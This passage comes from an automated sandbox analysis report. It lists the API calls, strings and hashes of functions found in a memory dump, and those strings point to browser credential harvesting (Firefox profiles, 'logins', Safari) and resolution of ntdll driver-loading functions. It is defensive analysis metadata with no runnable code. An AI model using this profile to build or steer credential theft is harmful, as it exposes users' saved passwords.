                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                      • API String ID: 577499730-1134094380
                      • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                      • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                      • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                      • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                      • String ID: :stringdata$ftp://$http://$https://
                      • API String ID: 2787044678-1921111777
                      • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                      • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                      • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                      • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                      • GetWindowRect.USER32(?,?), ref: 00414088
                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                      • GetDC.USER32 ref: 004140E3
                      • wcslen.MSVCRT ref: 00414123
                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                      • ReleaseDC.USER32(?,?), ref: 00414181
                      • _snwprintf.MSVCRT ref: 00414244
                      • SetWindowTextW.USER32(?,?), ref: 00414258
                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                      • GetClientRect.USER32(?,?), ref: 004142E1
                      • GetWindowRect.USER32(?,?), ref: 004142EB
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                      • GetClientRect.USER32(?,?), ref: 0041433B
                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                      • String ID: %s:$EDIT$STATIC
                      • API String ID: 2080319088-3046471546
                      • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                      • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                      • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                      • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                      APIs
                      • EndDialog.USER32(?,?), ref: 00413221
                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                      • memset.MSVCRT ref: 00413292
                      • memset.MSVCRT ref: 004132B4
                      • memset.MSVCRT ref: 004132CD
                      • memset.MSVCRT ref: 004132E1
                      • memset.MSVCRT ref: 004132FB
                      • memset.MSVCRT ref: 00413310
                      • GetCurrentProcess.KERNEL32 ref: 00413318
                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                      • memset.MSVCRT ref: 004133C0
                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
                      • memcpy.MSVCRT ref: 004133FC
                      • wcscpy.MSVCRT ref: 0041341F
                      • _snwprintf.MSVCRT ref: 0041348E
                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                      • SetFocus.USER32(00000000), ref: 004134B7
                      Strings
                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                      • {Unknown}, xrefs: 004132A6
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                      • API String ID: 4111938811-1819279800
                      • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                      • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                      • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                      • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                      APIs
                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                      • SetCursor.USER32(00000000,?,?), ref: 0040129E
                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                      • EndDialog.USER32(?,?), ref: 0040135E
                      • DeleteObject.GDI32(?), ref: 0040136A
                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                      • ShowWindow.USER32(00000000), ref: 00401398
                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                      • ShowWindow.USER32(00000000), ref: 004013A7
                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                      • String ID:
                      • API String ID: 829165378-0
                      • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                      • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                      • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                      • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                      APIs
                      • memset.MSVCRT ref: 00404172
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      • wcscpy.MSVCRT ref: 004041D6
                      • wcscpy.MSVCRT ref: 004041E7
                      • memset.MSVCRT ref: 00404200
                      • memset.MSVCRT ref: 00404215
                      • _snwprintf.MSVCRT ref: 0040422F
                      • wcscpy.MSVCRT ref: 00404242
                      • memset.MSVCRT ref: 0040426E
                      • memset.MSVCRT ref: 004042CD
                      • memset.MSVCRT ref: 004042E2
                      • _snwprintf.MSVCRT ref: 004042FE
                      • wcscpy.MSVCRT ref: 00404311
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                      • API String ID: 2454223109-1580313836
                      • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                      • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                      APIs
                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                      • SetMenu.USER32(?,00000000), ref: 00411453
                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                      • memcpy.MSVCRT ref: 004115C8
                      • ShowWindow.USER32(?,?), ref: 004115FE
                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                      • API String ID: 4054529287-3175352466
                      • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                      • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: wcscat$_snwprintfmemset$wcscpy
                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                      • API String ID: 3143752011-1996832678
                      • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                      • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                      • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                      • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                      APIs
                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                      • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                      • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$HandleModule
                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                      • API String ID: 667068680-2887671607
                      • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                      • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                      • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                      • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _snwprintfmemset$wcscpy$wcscat
                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                      • API String ID: 1607361635-601624466
                      • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                      • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                      • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                      • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _snwprintf$memset$wcscpy
                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                      • API String ID: 2000436516-3842416460
                      • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                      • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                      • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                      • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                      APIs
                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                      • String ID:
                      • API String ID: 1043902810-0
                      • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                      • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                      • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                      • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@??3@_snwprintfwcscpy
                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                      • API String ID: 2899246560-1542517562
                      • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                      • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                      • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                      • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                      APIs
                      • memset.MSVCRT ref: 0040DBCD
                      • memset.MSVCRT ref: 0040DBE9
                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                        • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                        • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                        • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                      • wcscpy.MSVCRT ref: 0040DC2D
                      • wcscpy.MSVCRT ref: 0040DC3C
                      • wcscpy.MSVCRT ref: 0040DC4C
                      • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                      • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                      • wcscpy.MSVCRT ref: 0040DCC3
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                      • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                      • API String ID: 3330709923-517860148
                      • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                      • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                      • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                      • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                      APIs
                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                        • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                      • memset.MSVCRT ref: 0040806A
                      • memset.MSVCRT ref: 0040807F
                      • _wtoi.MSVCRT ref: 004081AF
                      • _wcsicmp.MSVCRT ref: 004081C3
                      • memset.MSVCRT ref: 004081E4
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                        • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                        • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                      • String ID: logins$null
                      • API String ID: 3492182834-2163367763
                      • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                      • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                      • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                      • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                      APIs
                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                      • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      • memset.MSVCRT ref: 004085CF
                      • memset.MSVCRT ref: 004085F1
                      • memset.MSVCRT ref: 00408606
                      • strcmp.MSVCRT ref: 00408645
                      • _mbscpy.MSVCRT ref: 004086DB
                      • _mbscpy.MSVCRT ref: 004086FA
                      • memset.MSVCRT ref: 0040870E
                      • strcmp.MSVCRT ref: 0040876B
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                      • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                      • String ID: ---
                      • API String ID: 3437578500-2854292027
                      • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                      • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                      • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                      • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                      APIs
                      • memset.MSVCRT ref: 0041087D
                      • memset.MSVCRT ref: 00410892
